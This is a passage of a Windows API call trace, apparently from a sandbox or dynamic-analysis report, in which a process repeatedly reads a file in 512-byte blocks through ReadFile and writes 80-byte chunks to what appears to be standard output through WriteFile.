hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.690] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.690] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.690] GetFileType (hFile=0x50) returned 0x1 [0133.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.690] GetFileType (hFile=0x50) returned 0x1 [0133.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.690] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.690] GetFileType (hFile=0x50) returned 0x1 [0133.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.690] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.691] GetFileType (hFile=0x50) returned 0x1 [0133.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.691] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.691] GetFileType (hFile=0x50) returned 0x1 [0133.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.691] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.691] GetFileType (hFile=0x50) returned 0x1 [0133.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.691] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.691] GetFileType (hFile=0x50) returned 0x1 [0133.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.691] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.691] GetFileType (hFile=0x50) returned 0x1 [0133.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.691] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.691] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.691] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.692] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.692] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.692] GetFileType (hFile=0x50) returned 0x1 [0133.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.692] GetFileType (hFile=0x50) returned 0x1 [0133.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.692] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.692] GetFileType (hFile=0x50) returned 0x1 [0133.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.692] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.692] GetFileType (hFile=0x50) returned 0x1 [0133.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.692] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.692] GetFileType (hFile=0x50) returned 0x1 [0133.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.692] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.692] GetFileType (hFile=0x50) returned 0x1 [0133.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.692] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.693] GetFileType (hFile=0x50) returned 0x1 [0133.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.693] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.693] GetFileType (hFile=0x50) returned 0x1 [0133.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.693] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.693] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.693] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.693] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.693] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.693] GetFileType (hFile=0x50) returned 0x1 [0133.693] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.694] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.694] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.694] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.694] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.694] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.694] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.694] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.694] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.694] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.694] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.695] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.695] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.695] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.695] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.695] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.695] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.695] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.695] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.695] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.696] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.696] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.696] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.696] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.696] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.696] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.696] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.696] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.696] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.696] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.697] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.697] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.697] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.697] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.697] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.697] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.697] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.697] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.697] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.698] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.698] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.698] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.698] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.698] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.698] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.698] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.698] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.698] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.698] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.699] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.699] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.699] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.699] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.699] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.699] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.699] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.699] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.699] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.700] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.700] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.700] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.700] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.700] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.700] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.700] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.700] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.700] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.700] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.701] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.701] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, 